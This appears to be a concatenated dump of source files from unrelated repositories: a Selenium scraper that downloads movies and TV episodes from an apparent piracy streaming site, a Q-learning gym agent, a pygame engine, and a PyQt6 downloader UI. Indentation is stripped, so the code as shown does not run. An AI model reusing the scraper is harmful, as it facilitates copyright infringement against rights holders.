episode = filmname.split(" Episode ")[1].split(": ")[0]
try:
episode_title = filmname.split(": ")[(1 if " [" not in filmname else 2)]
# filename = f"{show_title} - s{season}ep{episode} - {episode_title}"
filename = f"{show_title} - s{season}ep{episode}"
except IndexError:
filename = f"{show_title} - s{season}ep{episode}"
absolute_path = os.path.abspath(
f"../TV SHOWS/{show_title}/Season {season}/{filename}.crdownload"
)
else:
print("Media is detected as Movie/Film.")
filename = (f"{filmname} ({year})" if filmname[-1] != ")" else filmname)
absolute_path = os.path.abspath(f"../MOVIES/{filename}/{filename}.crdownload")
stream = Stream(
request,
absolute_path,
(
resolution_override if resolution_override else resolution
),
)
stream.stream()
filename = filename.replace(".crdownload", ".mp4")
file_size = round(int(request.headers.get("content-length", 0))/1024/1024,2)
media.credit(self.author, filename=filename, resolution=resolution, file_size=file_size)
log(f"Finished download of {filename} in {resolution}p ({file_size} MB).", silent=False)
return True
if __name__ == "__main__":
def run_download(url, metadata, author):
download_function = Download(url, metadata, author)
threaded_download = Thread(target=download_function.run)
threaded_download.start()
scraper = Scraper(minimize=False)
search = input("Enter a Title to search for:\n> ")
while search:
download_queue = scraper.download_first_from_search(search)
if download_queue:
for data in download_queue:
if None in data:
log("No results!", silent=False)
run_download(data[0], data[1][list(data[1])[0]], data[2])
search = input("Enter a Title to search for:\n> ")
else:
log("No results!", silent=False)
```
#### File: 0xsmoos/PMD/progress.py
```python
import time
import media
from media import log
def file_size(filename, count, start_time=None, target_size=None):
size = media.size(filename)
size_MB = round(size/1024/1024, 2)
if ((count+1) % 25 == 0 or count == 3) and start_time and target_size:
filename = media.format_title(filename)
remaining_size = target_size-size
speed = size/(time.time()-start_time)
speed_MB = round(speed*8/(1024*1024), 2)
ETA = time.strftime("%Hh %Mm %Ss", time.gmtime(remaining_size/speed))
size_MB, target_size = int(size_MB), int(target_size/1024/1024)
msg = f"Downloading {filename} at ~{speed_MB} Mbps, ETA: {ETA} ({size_MB}/{target_size} MB)."
log(msg, silent=False)
return size
if __name__ == "__main__":
start_time_debug = time.time()
time.sleep(1)
file_size("chromedriver", 3, start_time_debug-time.time(), 100000000)
```
#### File: 0xsmoos/PMD/scraper.py
```python
import time
import os
import sys
from selenium import webdriver
from selenium.common.exceptions import *
from selenium.webdriver.common.by import By
from selenium.webdriver.chrome.options import Options
from selenium.webdriver.support.ui import WebDriverWait
from selenium.webdriver.support import expected_conditions as EC
import crop
import media
import config as cfg
from errors import NoResults
from media import log
class Scraper:
def __init__(self, minimize=True):
options = Options()
path = "Chrome Extensions"
files = os.listdir(path)
for file in files:
if file.endswith("crx"):
options.add_extension(os.path.abspath(path + "/" + file))
# options.add_argument("headless")
user_data_dir = os.path.abspath("selenium_data")
options.add_argument(f"user-data-dir={user_data_dir}")
options.add_argument("--disable-gpu")
options.add_argument("log-level=3")
self.driver = webdriver.Chrome(executable_path=os.path.abspath(cfg.executable), options=options)
self.first_launch = True
self.author = "0"
self.headers = {"user-agent": cfg.user_agent}
if minimize: self.driver.minimize_window()
def search(self, url, media_type=0):
if media_type == 0: # Movie (HD)
element_class = "item_hd"
description_class = "_smQamBQsETb"
elif media_type == 1: # Movie (CAM)
element_class = "item_cam"
description_class = "_smQamBQsETb"
elif media_type >= 2: # TV Show
element_class = "item_series"
description_class = "_skQummZWZxE"
self.open_link(url)
results, descriptions = self.get_results_from_search(
element_class=element_class,
decription_class=description_class
)
if not results:
if media_type >= 2: # TV Show
raise NoResults
media_type += 1
return self.search(url, media_type=media_type)
if media_type == 1: log("**INFO:** Film is in CAM quality.", silent=False)
if not descriptions: # this is the same as "if results and not descriptions:"
description_class = "_smQamBQsETb"
results, descriptions = self.get_results_from_search(
element_class=element_class,
decription_class=description_class
)
metadata = {}
for description in descriptions:
if description.get_attribute("data-filmname") != description.text: continue
metadata[description.text.replace(":","")] = {
"data-filmname": description.get_attribute("data-filmname").replace(":",""),
"data-year": description.get_attribute("data-year"),
"data-imdb": description.get_attribute("data-imdb").split(": ")[1],
"data-duration": description.get_attribute("data-duration"),
"data-country": description.get_attribute("data-country"),
"data-genre": description.get_attribute("data-genre"),
"data-descript": description.get_attribute("data-descript"),
"img": description.find_element_by_tag_name("img").get_attribute("src")
}
return results, metadata
def get_metadata_from_video(self, url):
filmname = self.driver.find_element(
By.XPATH, "//*[@id=\"info\"]/div[1]/div[1]/h1"
).text
metadata = {}
description = (
self.driver.find_elements(By.CLASS_NAME, "_skQummZWZxE") + \
self.driver.find_elements(By.CLASS_NAME, "_snsNGwwUUBn") + \
self.driver.find_elements(
By.XPATH, "/html/body/main/div/div/section/div[5]/div/box/div/div/div/div[3]"
)
)
metadata[filmname] = {
"data-filmname": filmname,
"data-year": description[0].text.split("\n")[1],
"data-imdb": description[1].text.split("\n")[1],
"data-duration": description[3].text.split("\n")[1],
"data-country": description[8].text.split(": ")[1],
"data-genre": description[6].text.split(": ")[1],
"data-descript": self.driver.find_element(
By.CLASS_NAME, "_snmrSkaJSTK").text.split("\n")[1],
"img": description[-1].get_attribute("src")
}
if not metadata[filmname]["img"]:
metadata[filmname]["img"] = \
"https://upload.wikimedia.org/wikipedia/commons/a/af/Question_mark.png"
return metadata
def wait_until_element(self, stratagy, locator, timeout=10):
wait = WebDriverWait(self.driver, timeout)
element = wait.until(
EC.presence_of_element_located(
(
stratagy, locator
)
)
)
return element
def open_link(self, url):
self.driver.get(url)
# The following code only runs when the adblock is still initializing from the first launch
if self.first_launch:
# Searches for any ads on the site
element = self.driver.find_elements(
By.XPATH,
"//*[@id=\"container-b530c7d909bb9eb21c76642999b355b4\"]/div[2]/div[5]/div/div[3]"
)
if element: # If any ads were found, refresh the page and run the ad check again
time.sleep(0.5)
self.driver.refresh()
self.open_link(url)
self.first_launch = False
def current_url(self):
return self.driver.current_url
def close(self):
self.driver.close()
def get_results_from_search(self, element_class="item_hd", decription_class="_smQamBQsETb"):
elements = self.driver.find_elements_by_class_name(element_class)
description = self.driver.find_elements_by_class_name(decription_class) # _skQummZWZxE
return elements, description
def screenshot_captcha(self, captcha_element, filename="captcha.png"):
self.driver.save_screenshot(filename)
# self.driver.save_screenshot("full_page.png")
location = captcha_element.location
location["y_off"] = 50
location["x_off"] = 120
return crop.crop(filename, location, cfg.executable)
def check_captcha(self):
# Myles
# Liam
try:
captcha_image = self.wait_until_element(
By.XPATH,
"//*[@id=\"checkcapchamodelyii-captcha-image\"]",
timeout=1.5
)
captcha_input = self.driver.find_element(By.XPATH, "//*[@id=\"checkcapchamodelyii-captcha\"]")
captcha_submit = self.driver.find_element(By.XPATH, "//*[@id=\"player-captcha\"]/div[3]/div/div")
except TimeoutException:
return None, None, None
if captcha_image:
print("DEBUG: Captcha!")
log("Captcha! Solve using the command:\n```beta solve <captcha_solution>```")
return captcha_image, captcha_input, captcha_submit
def run_captcha_functions(self):
captcha_image, captcha_input, captcha_submit = self.check_captcha()
if captcha_image:
time.sleep(0.25)
self.screenshot_captcha(captcha_image)
# log("DEBUG--file=captcha.png")
# solved_captcha = check_for_captcha_solve(timeout=1)
solved_captcha = False
if solved_captcha:
captcha_input.send_keys(solved_captcha)
captcha_submit.click()
def get_download_link(self, source_url, timeout=10):
movie = "watch-tv-show" not in source_url
# Link is a movie
if movie:
source_url = source_url.split(".html")[0] + (".html" if ".html" in source_url else "")
if not source_url.endswith("-online-for-free.html"):
source_url += "-online-for-free.html"
source_url_list = [source_url]
# Link is a TV show season
elif not source_url.endswith(".html"):
self.open_link(source_url)
source_url_list = self.driver.find_elements(By.XPATH, "//*[@class=\"_sXFMWEIryHd \"]")
for index, source_url in enumerate(source_url_list):
source_url_list[index] = source_url.get_attribute("href")
# Link is a TV show episode
else:
source_url = source_url.split(".html")[0] + ".html"
if not source_url.endswith("-online-for-free.html"):
source_url += "-online-for-free.html"
source_url_list = [source_url]
download_queue = []
for url in source_url_list:
if not url.endswith("-online-for-free.html"):
continue
self.open_link(url)
if self.run_captcha_functions(): self.get_download_link(url, timeout)
metadata = self.get_metadata_from_video(url) # Works for movies and TV
target_url = self.wait_until_element(
By.TAG_NAME, "video", timeout
).get_attribute("src")
self.driver.execute_script(
"videos = document.querySelectorAll(\"video\"); for(video of videos) {video.pause()}"
)
print(target_url)
download_queue.append((target_url,metadata,self.author))
# TODO: write all of the download links to a list so they can be downloaded in sequential order later (maybe return the list?)
return download_queue
# '''Demitri's Holy Contribution'''
# def get_movie(self, name):
# self.driver.get_link_by_partial_text("").click()
# self.driver.find_element_by_tag_name("input").text()
def download_first_from_search(self, search_query):
start_time = time.time()
search_results, metadata = self.search(
"https://gomovies-online.cam/search/" + \
"-".join(search_query.split())
)
if search_results:
search_time_elapsed = round(time.time()-start_time,2)
print(f"Finished scraping {len(search_results)} results in {search_time_elapsed} seconds!")
source_url = search_results[0].get_attribute("href")
download_queue = self.get_download_link(
source_url + ("-online-for-free.html" if "watch-tv-show" not in source_url else "")
) # [(x,y,z),(x,y,z),(x,y,z),...(x,y,z)]
print("Link found." if len(download_queue) == 1 else f"{len(download_queue)} links found.")
else:
print("Error: No search results found!")
print(f"Finished all scraping in {round(time.time()-start_time,2)} seconds!")
return download_queue # [(url,metadata,author)]
def run(self, search_query):
download_queue = self.download_first_from_search(search_query)[0]
return download_queue
def check_for_captcha_solve(timeout=100):
if __name__ == "__main__":
media.write_file("captcha.txt", input("Solve the captcha:\n> "))
filename = "captcha.txt"
for half_second in range(timeout*2):
time.sleep(0.5)
if os.path.isfile(filename):
solved_captcha = media.read_file(filename)[0]
media.remove_file(filename)
return solved_captcha
log(f"Captcha was not solved withing {timeout} seconds.\nAborting download.", silent=False)
return False
def error(e):
''' Code by Confused Cottonmouth - Jan 13 2021 '''
exc_type, exc_obj, exc_tb = sys.exc_info()
filename = os.path.split(exc_tb.tb_frame.f_code.co_filename)[1]
return f"```javascript\nException type: {exc_type}\nFile name: {filename}\nLine Number: {exc_tb.tb_lineno}\nException data: {e}```"
if __name__ == "__main__":
scraper = Scraper(minimize=False)
while True:
query = input("Enter a Title to search for:\n> ")
if query:
scraper.run(query)
else:
break
scraper.close()
# The criminal I've been chasing is wearing my shoes.
```
#### File: 0xsmoos/PMD/stream.py
```python
import time
import os
import config as cfg
import progress
import media
from media import log
headers = {"user-agent": cfg.user_agent}
quality = cfg.video_quality
class Stream:
def __init__(self, request, filename, resolution, chunk_size=cfg.stream_chunk_size):
filename = filename.replace("\\", "/").replace("'", "")
filename = "".join(filename.split(".")[:-1]) + "." + filename.split(".")[-1]
filename = (
"/".join(filename.split("/")[:1]) + "/" + "/".join(filename.split("/")[1:]).replace(":", "")
) if "exe" in cfg.executable else filename
self.request = request
self.filename = filename
self.resolution = resolution
self.chunk_size = chunk_size
self.target_size = int(request.headers.get("content-length", 0))
def write(self):
self.verify_path()
with open(self.filename, "wb") as file:
title = self.filename.split(".")[0].split("/")[-1:][0]
size_MB = round(self.target_size/1024/1024,2)
start_time = time.time()
msg = f"Downloading {title} in {self.resolution}p ({size_MB} MB)..."
log(msg, silent=False)
try:
for count, chunk in enumerate(self.request.iter_content(chunk_size=self.chunk_size)):
file.write(chunk)
progress.file_size(
self.filename,
count,
start_time,
target_size=self.target_size
)
# except ConnectionResetError as e:
except Exception as e:
log(f"ERROR with {title}: Connection Reset!\nRetrying download...")
log(str(e))
self.write()
def verify_path(self):
path = "/".join(self.filename.split("/")[:-1])
path_exists = os.path.isdir(path)
if not path_exists:
os.makedirs(path)
return path_exists
def stream(self):
with self.request as r:
r.raise_for_status()
self.write()
print(media.rename(self.filename, self.filename.replace(".crdownload",".mp4")))
if __name__ == "__main__":
print(
Stream(
None, "MOVIES/Black Widow (2021)/Black Widow (2021).crdownload", 1080
).verify_path()
)
``` |
{
"source": "0xSMT/smt-env",
"score": 3
} |
#### File: smt-env/examples/qlearn-agent.py
```python
from smtenv import SMTEnv
from smtenv.envs.atesim import ATESim
import numpy as np
from collections import defaultdict
import matplotlib.pyplot as plt
class QLearnAgent(object):
def __init__(self, action_space, alpha = 0.6, gamma = 0.1, argmax=np.argmax, state_parse=None):
self.action_space = action_space
self.q = defaultdict(lambda: np.zeros(action_space.n))
self.alpha = alpha
self.gamma = gamma
self.na = self.action_space.n
self.last_action = None
self.state = None
self.state_parse = state_parse
self.argmax = argmax
def reset(self):
self.q = defaultdict(lambda: np.zeros(self.action_space.n))
def policy(self, state, epsilon = 0.00):
self.action_dist = np.ones(self.na, dtype=float) * (epsilon / self.na)
opt_a = self.argmax(self.q[state])
# print(self.q[state])
self.action_dist[opt_a] += (1.0 - epsilon)
return self.action_dist
def prop_policy(self, ob):
states = self.state_parse(ob)
positives = np.zeros(self.na)
tot = 0
# for state in states:
# dist = self.q[state].clip(0)
# positives += dist
# tot += np.sum(dist)
for state in states:
dist = self.q[state]
positives += dist
positives = positives.clip(0)
tot = np.sum(positives)
if tot != 0:
self.action_dist = positives / tot
else:
self.action_dist = np.ones(self.na, dtype=float) / self.na
return self.action_dist
def act(self, observation, reward, done):
return np.random.choice(np.arange(self.na), p=self.prop_policy(observation))
# next_action = self.policy(observation)
# if self.last_action != None:
# td = reward + self.gamma * self.q[observation][next_action] - self.q[self.state][self.last_action]
# self.q[self.state][self.last_action] += self.alpha * td
# self.state = observation
# self.last_action = next_action
# return self.last_action
def ate_state_parser(state):
states = []
for i in range(2, len(state), 2):
pair = state[i], state[i + 1]
states.append(pair)
return states
def train(agent, env, num_episodes = 100, episode_len = 100):
episode_results = dict()
episode_results["total_rwd"] = []
episode_results["length"] = []
for episode_i in range(num_episodes):
ob = env.reset()
reward = 0
total_rwd = 0
done = False
episode_log = {
"rwd": list()
}
steps = 0
print("Starting Episode {0}".format(episode_i))
for _ in range(episode_len):
action = agent.act(ob, reward, done)
next_ob, reward, done, _ = env.step(action)
episode_log["rwd"].append(reward)
total_rwd += reward
for last_state in agent.state_parse(ob):
for next_state in agent.state_parse(next_ob):
next_action = np.argmax(agent.q[next_state])
td = reward + agent.gamma * agent.q[next_state][next_action] - agent.q[last_state][action]
agent.q[last_state][action] += agent.alpha * td
if done:
break
steps += 1
ob = next_ob
episode_log["total_rwd"] = total_rwd
episode_results[episode_i] = episode_log
episode_results["total_rwd"].append(total_rwd)
episode_results["length"].append(steps)
return episode_results
# NOTE TODO: instead of treating the state as seeing three enemies at once, treat it as three separate states, seeing one enemy at a time, and
# sum the three action distributions generated by applying the policy to the three states, and renormalize. MUCH smaller state space
# to consider, and actually boosts the information gain as well.
if __name__ == '__main__':
scenario = {
"width": 4,
"height": 4,
"cellsize": 100,
"player": {
"x": 0,
"y": 0,
"vision": 2
},
"enemies": [
{
"id": "A",
"x": 2,
"y": 2,
"behavior": "chase",
"action_rate": 6
}
]
}
env = SMTEnv.register(
ATESim,
display_screen=False,
state_preprocessor=ATESim.state_flatten,
config=scenario,
fps=10
)
agent = QLearnAgent(env.action_space, state_parse=ate_state_parser)
results = train(agent, env, num_episodes=1000)
env.set_display(True)
SMTEnv.run(env, agent, episode_count=5, debug=True)
env.close()
# ep = np.linspace(0, len(results["total_rwd"]), num=len(results["total_rwd"]))
# plt.plot(ep, results["total_rwd"])
# plt.show()
```
#### File: smt-env/smtenv/smtenv.py
```python
import os
import gym
from gym import spaces
import numpy as np
import sys, os
os.environ['PYGAME_HIDE_SUPPORT_PROMPT'] = "hide"
import pygame
from smtenv.basegame import BaseGame
class _GameWrapper:
def __init__(self,
game, lock_fps=False, fps=30, display=True, state_preprocessor=None):
self.game = game
self.fps = fps
self.NOOP = None
self.display = display
self.lock_fps = lock_fps
self.last_action = []
self.action = []
self.previous_score = 0
self.frame_count = 0
self.noop = -1
if not isinstance(self.game, BaseGame):
class_name = self.game.__class__.__name__
raise Exception("{0} is BaseGame: {1}".format(class_name, isinstance(self.game, BaseGame)))
self.game.setup(display=self.display)
self.game.init()
self.state_preprocessor = state_preprocessor
def displayable(self):
return self.display
def set_display(self, display_flag):
self.display = display_flag
self.game._setup_display(display_flag)
def _tick(self):
if not self.display or self.lock_fps:
return 1000.0 / self.fps
else:
return self.game.tick(self.fps)
def get_actions(self):
actions = self.game.get_actions()
actions = list(actions)
actions.append(self.noop)
return actions
def get_frame_number(self):
return self.frame_count
def game_over(self):
return self.game.is_game_over()
def score(self):
return self.game.get_score()
def reset_game(self):
self.last_action = []
self.action = []
self.previous_score = 0.0
self.game.reset()
def get_screen_dims(self):
return self.game.get_screen_dims()
def get_game_state(self):
state = self.game.get_game_state()
if self.state_preprocessor is not None:
return self.state_preprocessor(state)
else:
return state
def act(self, action):
if self.game_over():
return 0.0
if action not in self.get_actions():
action = self.noop
previous_score = self.score()
self.game._do_action(action)
dt = self._tick()
self.game.step(dt)
self.game._draw()
self.frame_count += 1
rwd = self.score() - previous_score
return rwd
class SMTEnv(gym.Env):
@staticmethod
def register(game, display_screen=True, state_preprocessor=lambda x: x, fps=30, **args):
game_name = game.__class__.__name__
gym.envs.registration.register(
id=game_name.lower() + "-v0",
entry_point='smtenv:SMTEnv',
kwargs={'game_class': game, 'display_screen': display_screen, 'state_preprocessor': state_preprocessor, 'fps': fps, 'kwargs': args}
)
return gym.make(game_name.lower() + "-v0")
@staticmethod
def run(env, agent, episode_count=5, episode_length=100, debug=False):
reward = 0
done = False
for i in range(episode_count):
if debug:
print("Starting Episode {0}".format(i))
ob = env.reset()
for _ in range(episode_length):
action = agent.act(ob, reward, done)
ob, reward, done, _ = env.step(action)
if debug:
print(ob)
if done:
break
if debug:
print("Died? {0}".format(done))
env.close()
def __init__(self, game_class, display_screen=True, state_preprocessor=lambda x: x, fps=30, kwargs={}):
# import importlib
# game_module_name = game_name.lower()
# game_module = importlib.import_module(game_module_name)
# game = getattr(game_module, game_name)(**kwargs)
game = game_class(**kwargs)
self.game_state = _GameWrapper(game, fps=fps, display=display_screen, state_preprocessor=state_preprocessor)
self._action_set = self.game_state.get_actions()
self.action_space = spaces.Discrete(len(self._action_set))
self.screen_height, self.screen_width = self.game_state.get_screen_dims()
self.viewer = None
def set_display(self, display_flag):
self.game_state.set_display(display_flag)
def step(self, a):
reward = self.game_state.act(self._action_set[a])
state = self.game_state.get_game_state()
terminal = self.game_state.game_over()
return state, reward, terminal, {}
@property
def _n_actions(self):
return len(self._action_set)
def reset(self):
self.game_state.reset_game()
state = self.game_state.get_game_state()
return state
def render(self):
if self.game_state.displayable():
self.game_state.game._draw()
``` |
{
"source": "0xSTAR/hagia",
"score": 3
} |
#### File: hagia/editor_utils/font.py
```python
import sys
import os
_stdout = sys.stdout
sys.stdout = open(os.devnull,'w')
import pygame.freetype
sys.stdout = _stdout
del(_stdout)
del(sys)
del(os)
from editor_utils.local_vars import (
default_font
)
class font(object):
def __init__(self,font:str=None) -> None:
self.font = font if not font==None else default_font
def load(self):# returns a font
return pygame.freetype.Font(self.font)
```
#### File: hagia/hagia/soundSYS.py
```python
import sys
_stdout = sys.stdout
sys.stdout = None
from pygame import (
mixer
)
from pygame.locals import *
sys.stdout = _stdout
del _stdout
del sys
from .errata import (
BASE_HAGIA_ERROR,
HAGIA_ASSERT
)
from os import path
from .utils import Thread
from .defs import HAGIA_SPECS
class SoundSystem(object):
def __init__(self):
pass
def init_sound(self):
try:
mixer.pre_init(
frequency=44100,
size=-16,
channels=2,
buffer=512,
devicename=None,
allowedchanges=AUDIO_ALLOW_FREQUENCY_CHANGE | AUDIO_ALLOW_CHANNELS_CHANGE
)
mixer.init()
except:
raise BASE_HAGIA_ERROR("hagia.sound.SoundSystem failed to initialize")
self.snd:list = []
self.mus:list = []
self.channels:list = []
for chnl in range(HAGIA_SPECS.SOUND_CHANNELS):
self.channels.append(
mixer.Channel(chnl)
)
#self.channels[chnl].__currently_playing = -1
async def load_sound_data(self):
self.snd:list = []
self.mus:list = []
def ok_list_of_strs(_dataset:list) -> bool:
for sndx in _dataset:
print(_dataset)
if not sndx is str:
return False
return True
def check_list_snd_mus(_attr:str,*args):
if (
getattr(self.cart,_attr) is list and
len(getattr(self.cart,_attr)) > 0
):
HAGIA_ASSERT(
ok_list_of_strs(getattr(self.cart,_attr)),
"Error: Must be a list of strings for SFX and MUSIC."
)
sfx_check = Thread(
target=check_list_snd_mus,
args=("sfx",)
)
mus_check = Thread(
target=check_list_snd_mus,
args=("music",) # comma otherwise breaks and
# pretends the string is a list
# :)
)
sfx_check.start()
mus_check.start()
#for sndx,musx in zip(self.cart.sfx,self.cart.music):
# self.snd.append(
# mixer.Sound(path.join(self.cart.c_data_directory,sndx))
# )
# self.mus.append(
# path.join(self.cart.c_data_directory,musx)
# )
for sndx in self.cart.sfx:
self.snd.append(
mixer.Sound(path.join(self.cart.c_data_directory,sndx))
)
for musx in self.cart.music:
self.mus.append(
path.join(self.cart.c_data_directory,musx)
)
sfx_check.join()
mus_check.join()
del sfx_check
del mus_check
def sfx(
self,
n:int,
channel:int=-1,
fade_len:int=0
) -> None:
# default) to automatically choose a channel that is not being used
if channel < 0:
for c in self.channels:
if n==-1:c.stop();continue
elif n==-2:c.fadeout(fade_len);continue
if channel==-1 and not c.get_busy():
c.play(self.snd[n],fade_ms=fade_len)
return
elif channel==-2 and c.get_sound() == self.snd[n]:
c.stop()
return
return
if n == -1:
self.channels[channel].stop()
return
elif n==-2:
self.channels[channel].fadeout(fade_len)
return
# normal
self.channels[channel].play(self.snd[n],fade_ms=fade_len)
def music(
self,
n:int,
fade_len:int=0,
#channel_mask:int=-1,
loop:int=-1,
offset:float=0.0
) -> None:
if n==-1:
mixer.music.stop()
mixer.music.unload()
return
if not mixer.music.get_busy():
mixer.music.stop()
mixer.music.unload()
mixer.music.load(self.mus[n])
mixer.music.play(loops=loop,start=offset,fade_ms=fade_len)
```
#### File: hagia/hagia/system.py
```python
import sys
_stdout = sys.stdout
sys.stdout = None
from pygame import init, event, quit, time
sys.stdout = _stdout
del _stdout
from .graphicSYS import GraphicSystem
from .soundSYS import SoundSystem
from .inputSYS import InputSystem
from .mapSYS import MapSystem
from .flagSYS import FlagSystem
from .utils import *
from .defs import HAGIA_SPECS
from typing import NoReturn
import asyncio
class System(
GraphicSystem, SoundSystem, InputSystem,
FlagSystem,MapSystem
):
def __init__(self):
pass
# booting up the system with the cart
def __init_system__(self,_cartridge) -> None:
self._cart = _cartridge
self.cart = self._cart()
init()
self.init_flags()
self.init_map()
self.init_graphics()
self.init_sound()
self.init_input()
# init time stuff
self.init_time()
self.init_camera()
asyncio.run(self.load_cart_data())
async def load_cart_data(self) -> None:
# all of these functions will assume a self.cart exists in them
# despite them not existing in the class whatsoever
# which may cause confusion for maintenance, but whatever
t2 = asyncio.create_task(self.load_sound_data())
t3 = asyncio.create_task(self.load_map_data())
t4 = asyncio.create_task(self.load_flag_data())
t1 = asyncio.create_task(self.load_graphics_data())
await t1
await t2
await t3
await t4
# PRINT SIZES OF DATA
#self.DEBUG_DATASET_SIZES()
del t1
del t2
del t3
del t4
def DEBUG_DATASET_SIZES(self):
print("----------------------------------------\n")
print(f"Gfx size : {sys.getsizeof(self.atlas) / 1000} mB")
print(f"Map size : {sys.getsizeof(self._map)/ 1000} mB")
print(f"Sfx size : {sys.getsizeof(self.snd) / 1000} mB")
print(f"Mus size : {sys.getsizeof(self.mus) / 1000} mB")
print(f"Cart size : {sys.getsizeof(self.cart) / 1000} mB")
print("\n----------------------------------------\n")
def main_loop(self) -> None:
self.cart.init()
self._main_loop:bool = True
while self._main_loop:
self.pump()
self.reg_evs()
self.cart.update()
self.cart.draw()
self.render()
#self.cls(0)
self.check_evs()
self.tick()
self.main_loop()
def reg_evs(self) -> None:
self.evs = [ev.type for ev in event.get()]
self.reg_kevs()
event.clear()
def check_evs(self) -> None:
# if WINDOW_X_BUTTON button was pressed
# or if HAGIA_CONTROLS.EXIT button was pressed
if (
0x100 in self.evs or
self.btn(8)
):
self.SHUTDOWN()
if (
self.btn(6)
):
self.RESET()
if (
self.btn(7)
):
self.PAUSE()
def pump(self) -> None:
event.pump()
def init_time(self) -> None:
self.fr = HAGIA_SPECS.FRAMERATE
self.clock = time.Clock()
def tick(self) -> None:
self.clock.tick(self.fr)
# delta-time
def dt(self) -> float:
return self.clock.get_time() / 1000
def init_camera(self) -> None:
self._camera = Vec2i(0,0)
def camera(self,x:int=0,y:int=0) -> None:
self._camera.set_to( flr(-x), flr( -y) )
def PAUSE(self) -> None:
pass
def RESET(self) -> None:
self.cart = self._cart()
asyncio.run(self.load_cart_data())
self._main_loop:bool = False
def SHUTDOWN(self) -> NoReturn:
quit()
sys.exit("Shutting down Hagia...")
```
#### File: hagia/utils/hstrings.py
```python
def sub(
_str:str,
_from:int,
_to:int=None
) -> str:
_to = _from + 1 if _to == None else _to
return _str[_from:_to]
def tostr(
val,
_hex:bool=False
) -> str:
return str(val) if not _hex else str(hex(val))
def tonum(
_str:str
) -> float or int:
try:
return int(_str)
except ValueError:
return float(_str)
``` |
{
"source": "0xSTAR/NH-DL",
"score": 2
} |
#### File: NH-DL/src/base_ui.py
```python
from PyQt6 import QtCore, QtGui, QtWidgets
from lang_db import (
SELECTED_LANG,
LANGS,
LANG_DB
)
#from copy import deepcopy
class Ui_Form(object):
def setupUi(self, Form):
Form.setObjectName("Form")
Form.setEnabled(True)
Form.resize(440, 679)
### UNIVERSAL APP FONT ###
QtGui.QFontDatabase.addApplicationFont("content/FiraCode-Bold.ttf")
UNIVERSAL_FONT = QtGui.QFont("Fira Code")
##########################
self.sauceBox = QtWidgets.QLineEdit(Form)
self.sauceBox.setGeometry(QtCore.QRect(40, 239, 251, 41))
font = UNIVERSAL_FONT#QtGui.QFont()
font.setPointSize(20)
self.sauceBox.setFont(font)
self.sauceBox.setStyleSheet("background: rgba(255, 255, 255,195);")
self.sauceBox.setMaxLength(6)
self.sauceBox.setFrame(True)
self.sauceBox.setAlignment(QtCore.Qt.AlignmentFlag.AlignCenter)
self.sauceBox.setObjectName("sauceBox")
self.saveDirectory = QtWidgets.QLineEdit(Form)
self.saveDirectory.setGeometry(QtCore.QRect(40, 350, 351, 41))
font = UNIVERSAL_FONT#deepcopy(UNIVERSAL_FONT)#QtGui.QFont()
font.setPointSize(20)
self.saveDirectory.setFont(font)
self.saveDirectory.setCursor(QtGui.QCursor(QtCore.Qt.CursorShape.ArrowCursor))
self.saveDirectory.setStyleSheet("background: rgba(255, 255, 255,195);")
self.saveDirectory.setInputMask("")
self.saveDirectory.setText("")
self.saveDirectory.setFrame(True)
self.saveDirectory.setEchoMode(QtWidgets.QLineEdit.EchoMode.Normal)
self.saveDirectory.setCursorPosition(0)
self.saveDirectory.setAlignment(QtCore.Qt.AlignmentFlag.AlignCenter)
self.saveDirectory.setReadOnly(True)
self.saveDirectory.setObjectName("saveDirectory")
self.labelSauce = QtWidgets.QLabel(Form)
self.labelSauce.setGeometry(QtCore.QRect(40, 190, 200, 35))
font = UNIVERSAL_FONT#deepcopy(UNIVERSAL_FONT)#QtGui.QFont()
font.setPointSize(15)
font.setBold(True)
font.setItalic(False)
font.setUnderline(False)
font.setWeight(75)
font.setStyleStrategy(QtGui.QFont.StyleStrategy.PreferAntialias)
self.labelSauce.setFont(font)
self.labelSauce.setAutoFillBackground(False)
self.labelSauce.setStyleSheet("color: rgb(255, 255, 255);")
self.labelSauce.setLineWidth(0)
self.labelSauce.setAlignment(QtCore.Qt.AlignmentFlag.AlignBottom|QtCore.Qt.AlignmentFlag.AlignLeading|QtCore.Qt.AlignmentFlag.AlignLeft)
self.labelSauce.setObjectName("labelSauce")
self.saveDirLabel = QtWidgets.QLabel(Form)
self.saveDirLabel.setGeometry(QtCore.QRect(40, 310, 200, 35))
font = UNIVERSAL_FONT#deepcopy(UNIVERSAL_FONT)#QtGui.QFont()
font.setPointSize(15)
font.setBold(True)
font.setItalic(False)
font.setUnderline(False)
font.setWeight(75)
font.setStyleStrategy(QtGui.QFont.StyleStrategy.PreferAntialias)
self.saveDirLabel.setFont(font)
self.saveDirLabel.setAutoFillBackground(False)
self.saveDirLabel.setStyleSheet("color: rgb(255, 255, 255);")
self.saveDirLabel.setLineWidth(0)
self.saveDirLabel.setAlignment(QtCore.Qt.AlignmentFlag.AlignBottom|QtCore.Qt.AlignmentFlag.AlignLeading|QtCore.Qt.AlignmentFlag.AlignLeft)
self.saveDirLabel.setObjectName("saveDirLabel")
self.downloadFrame = QtWidgets.QFrame(Form)
self.downloadFrame.setGeometry(QtCore.QRect(310, 240, 81, 41))
self.downloadFrame.setStyleSheet("border-width: 10px;\n"
"border-radius: 50px; \n"
"")
self.downloadFrame.setFrameShape(QtWidgets.QFrame.Shape.StyledPanel)
self.downloadFrame.setFrameShadow(QtWidgets.QFrame.Shadow.Raised)
self.downloadFrame.setObjectName("downloadFrame")
self.exitButton_2 = QtWidgets.QPushButton(self.downloadFrame)
self.exitButton_2.setGeometry(QtCore.QRect(0, 0, 81, 41))
font = UNIVERSAL_FONT#deepcopy(UNIVERSAL_FONT)#QtGui.QFont()
#font.setFamily("Sans Serif")
font.setPointSize(25)
font.setBold(True)
font.setWeight(75)
font.setStyleStrategy(QtGui.QFont.StyleStrategy.PreferAntialias)
self.exitButton_2.setFont(font)
self.exitButton_2.setCursor(QtGui.QCursor(QtCore.Qt.CursorShape.OpenHandCursor))
self.exitButton_2.setStyleSheet("background: rgb(236,40,84); \n"
"color: rgb(255,255,255);")
self.exitButton_2.setObjectName("exitButton_2")
self.changeDirectoryFrame = QtWidgets.QFrame(Form)
self.changeDirectoryFrame.setGeometry(QtCore.QRect(40, 400, 351, 41))
self.changeDirectoryFrame.setStyleSheet("border-width: 10px;\n"
"border-radius: 50px; \n"
"")
self.changeDirectoryFrame.setFrameShape(QtWidgets.QFrame.Shape.StyledPanel)
self.changeDirectoryFrame.setFrameShadow(QtWidgets.QFrame.Shadow.Raised)
self.changeDirectoryFrame.setObjectName("changeDirectoryFrame")
